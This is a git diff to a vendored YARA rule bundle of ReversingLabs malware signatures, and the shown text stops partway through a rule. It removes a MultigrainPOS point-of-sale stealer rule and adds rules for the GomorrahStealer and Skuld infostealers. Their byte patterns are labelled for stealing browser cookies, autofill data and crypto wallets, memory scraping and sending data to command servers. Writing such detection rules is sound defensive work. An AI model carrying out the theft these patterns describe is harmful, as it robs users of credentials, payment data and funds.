diff --git a/third_party/yara/YARAForge/RELEASE b/third_party/yara/YARAForge/RELEASE
index 0e4856e82..33a406944 100644
--- a/third_party/yara/YARAForge/RELEASE
+++ b/third_party/yara/YARAForge/RELEASE
@@ -1 +1 @@
-20260222
+20260301
diff --git a/third_party/yara/YARAForge/yara-rules-full.yar b/third_party/yara/YARAForge/yara-rules-full.yar
index c756063d7..e156debbf 100644
--- a/third_party/yara/YARAForge/yara-rules-full.yar
+++ b/third_party/yara/YARAForge/yara-rules-full.yar
@@ -12,9 +12,9 @@
  * Force Exclude Importance Level: 0
  * Minimum Age (in days): 0
  * Minimum Score: 40
- * Creation Date: 2026-02-22
- * Number of Rules: 11646
- * Skipped: 0 (age), 238 (quality), 8 (score), 0 (importance)
+ * Creation Date: 2026-03-01
+ * Number of Rules: 11652
+ * Skipped: 0 (age), 230 (quality), 8 (score), 0 (importance)
  */
 
 import "console"
@@ -30,7 +30,7 @@ import "string"
  * YARA Rule Set
  * Repository Name: ReversingLabs
  * Repository: https://github.com/reversinglabs/reversinglabs-yara-rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: e0a0be54aa1e11ccfd6854e4f19e9476f328fd84
  * Number of Rules: 1240
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -58,90 +58,6 @@ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
  */
-rule REVERSINGLABS_Win32_Infostealer_Multigrainpos : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects MultigrainPOS infostealer."
-		author = "ReversingLabs"
-		id = "595c04af-802f-556d-b22b-23cac79b256e"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/Win32.Infostealer.MultigrainPOS.yara#L1-L88"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9808c95b850a54677c4132057b8372cabf0159920b7e0e6834a83f0d39c088fa"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "MultigrainPOS"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$data_exfiltration_v10_1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 1D ?? ?? ?? ?? 56 57 8B 3D ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F
-            43 45 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81
-            FE ?? ?? ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 75 ?? 83 7D ?? ?? 5F 5E 5B 72 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 CD B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
-            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF D3 EB
-        }
-		$memory_scraping_v10_1 = {
-            6A ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? EB ?? 3C ?? 7C ?? 3C ?? 7E ?? 8A 46 ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 74
-        }
-		$process_search_v10_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 1D ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? 8D
-            85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75
-        }
-		$service_creation_v10_1 = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 5E 8B 4C 24 ?? 33 CC E8 ?? ??
-            ?? ?? 8B E5 5D C3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15
-        }
-		$process_search_v11_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8B 7D ?? FF 15 ??
-            ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 8D 49 ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ??
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF D3 EB ?? 8D 8D
-            ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 66 89
-            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 EB ?? 8D A4 24 ??
-            ?? ?? ?? EB ?? 8D 49 ?? 0F B7 84 0D ?? ?? ?? ?? 66 89 84 0D ?? ?? ?? ?? 8D 49 ?? 66
-            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-        }
-		$memory_scraping_v11_1 = {
-            6A ?? 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 6A ??
-            56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8
-        }
-		$data_exfiltration_v11_1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8A 5D ?? 56 57 8B 3D ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F 43 45 ??
-            6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 FE ?? ??
-            ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 74 ?? 84 DB 74 ?? 33 F6 83 7D ?? ?? 72 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
-            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 84 DB 74 ?? EB ?? BE ?? ?? ?? ?? EB
-        }
-		$service_creation_v11_1 = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 4C 24 ?? 33 CC E8 ?? ?? ??
-            ?? 8B E5 5D C3 8D 44 24 ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $data_exfiltration_v10_1 and $memory_scraping_v10_1 and $process_search_v10_1 and $service_creation_v10_1 ) or ( $process_search_v11_1 and $memory_scraping_v11_1 and $data_exfiltration_v11_1 and $service_creation_v11_1 ) )
-}
 rule REVERSINGLABS_Win32_Infostealer_Projecthookpos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
@@ -237,6 +153,103 @@ rule REVERSINGLABS_Win32_Infostealer_Projecthookpos : TC_DETECTION MALICIOUS MAL
 	condition:
 		uint16( 0 ) == 0x5A4D and ( $calc_luhn and $track_1_reverse and $check_validity_1 and $encode_and_send_1 and $form_create_1 and $form_create_2 and $form_create_3 )
 }
+rule REVERSINGLABS_Bytecode_MSIL_Infostealer_Gomorrahstealer : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects GomorrahStealer infostealer."
+		author = "ReversingLabs"
+		id = "f3c14d23-47a2-5b09-8f48-0c2f9350516a"
+		date = "2024-11-27"
+		modified = "2024-11-27"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/ByteCode.MSIL.Infostealer.GomorrahStealer.yara#L1-L111"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "75d86ea2ef9f24487ef54979508170651cd60abba6daa4c3117e20a77bb3b086"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "GomorrahStealer"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$get_browser_autofill_data = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
+            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
+            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
+            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ??
+            ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ??
+            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00
+            11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13
+            ?? 00 28 ?? ?? ?? ?? DE
+        }
+		$get_browser_cookies = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
+            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
+            13 ?? 38 ?? ?? ?? ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
+            16 2B ?? 17 00 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 14 (FE | 01) ?? 13 ??
+            11 ?? 2C ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 00
+            08 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00 11 ?? 17 72 ?? ?? ?? ?? A2 00 11
+            ?? 18 11 ?? A2 00 11 ?? 19 72 ?? ?? ?? ?? A2 00 11 ?? 1A 11 ?? A2 00 11 ?? 1B 72 ??
+            ?? ?? ?? A2 00 11 ?? 1C 11 ?? A2 00 11 ?? 1D 72 ?? ?? ?? ?? A2 00 11 ?? 1E 11 ?? A2
+            00 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11
+            ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ??
+            16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
+        }
+		$take_screenshot = {
+            12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 28
+            ?? ?? ?? ?? 0A 06 12 ?? 16 16 28 ?? ?? ?? ?? 00 11 ?? 12 ?? 16 16 28 ?? ?? ?? ?? 00
+            11 ?? 08 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
+            ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE
+        }
+		$get_antivirus_information = {
+            7E ?? ?? ?? ?? 0B 00 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            1B (FE | 02) ?? 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
+            73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
+            13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 00 11 ?? 6F ?? ?? ?? ??
+            13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 00 08 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 28
+            ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 08 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 0C DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
+            11 ?? 3A ?? ?? ?? ?? 00 DE ?? 11 ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ??
+            11 ?? 6F ?? ?? ?? ?? 00 00 DC 08 0B DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00
+            07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 07 17 8D ?? ?? ?? ?? 13 ?? 11 ??
+            16 1F ?? 9D 11 ?? 6F ?? ?? ?? ?? 17 9A 16 8D ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 0B 00 07 0A 2B ?? 06
+        }
+		$get_browser_history = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
+            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
+            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
+            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17
+            D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 31 ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $get_browser_autofill_data ) and ( $get_browser_cookies ) and ( $take_screenshot ) and ( $get_antivirus_information ) and ( $get_browser_history )
+}
 rule REVERSINGLABS_Win32_Infostealer_Lumarstealer : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
@@ -412,6 +425,235 @@ rule REVERSINGLABS_Win32_Infostealer_Lumarstealer : TC_DETECTION MALICIOUS MALWA
 	condition:
 		uint16( 0 ) == 0x5A4D and ( all of ( $collect_os_information_p* ) ) and ( all of ( $send_data_to_c2_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $find_crypto_wallets_* ) )
 }
+rule REVERSINGLABS_Win64_Infostealer_Skuld : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects Skuld infostealer."
+		author = "ReversingLabs"
+		id = "2658fc6e-3f3f-5042-be05-cdcc3a29f133"
+		date = "2025-06-10"
+		modified = "2025-06-10"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/Win64.Infostealer.Skuld.yara#L1-L192"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "a927a8bc74e2a6676825b208cd74f1be09cc3bc3aea7f7d54c5d016a330e77c2"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "Skuld"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$get_mac_address = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 85 FF 75 ?? EB ?? 31 C0 31 DB 48 89 F9 48 89 F7 48 81 C4 ?? ?? ?? ??
+            5D C3 48 83 C0 ?? 48 FF CB 48 85 DB 0F 8E ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10
+            40 ?? 0F 11 44 24 ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ??
+            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 0F BA E2 ?? 90 73 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74
+            ?? 31 C9 EB ?? 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 DB
+            31 C9 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 89 C1 48 8B 84 24 ?? ?? ?? ?? 83 F1 ?? EB ?? 31
+            C9 84 C9 0F 84 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 89 54 24 ?? 48
+            8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 74 24 ?? 48
+            8B 7C 24 ?? 31 C9 31 DB EB ?? 31 C0 31 C9 EB ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ??
+            31 C9 31 FF 48 89 FE 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 31 C0 31 DB 48
+            81 C4 ?? ?? ?? ?? 5D C3 48 89 C3 31 FF 48 89 C8 31 C9 48 81 C4 ?? ?? ?? ?? 5D C3 44
+            88 44 03 ?? 48 FF C1
+        }
+		$find_files_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ??
+            ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 9C
+            24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48
+            8B 4C 24 ?? 48 FF C1 48 8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ??
+            ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 53 ?? 48 89 94 24 ?? ?? ?? ?? 4C 8B
+            00 4C 89 44 24 ?? 4C 8B 48 ?? 4C 89 8C 24 ?? ?? ?? ?? 48 39 D1 75 ?? 31 C0 48 8B 9C
+            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 66 90 EB ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ??
+            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8B
+            4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? ?? ?? FF D2 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9
+            48 8B 94 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 0F 45 D3 48 89 54 24 ?? 48 8B 9C 24 ?? ??
+            ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 0F 45 DF 48 89 9C 24 ?? ?? ?? ?? 84 C0 0F 84 ?? ??
+            ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? ?? ?? FF D2 48 89 84 24 ?? ?? ??
+            ?? 48 89 9C 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D B4 24
+        }
+		$find_files_p2 = {
+            41 B8 ?? ?? ?? ?? 4D 89 C1 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
+            94 24 ?? ?? ?? ?? 48 39 D1 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 84 24
+            ?? ?? ?? ?? FF D1 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 8C 24
+            ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ??
+            48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ??
+            ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
+            ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 48
+            8B B4 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4D 89 C1 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24
+            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 11 90 66 90 48 85 D2 74 ?? 48 39 D1
+            74 ?? E9 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 49 89 0B 48 8B 11 49
+            89 53 ?? 48 89 09 48 8B 51 ?? 4C 8B 41 ?? 4E 8D 0C 03 4C 8B 51 ?? 4C 39 CA 73 ?? 4C
+            89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 4C 89 D0 48 89 D1 48 89
+            DF 48 8D 35 ?? ?? ?? ?? 4C 89 CB E8 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 49 89 C2 49
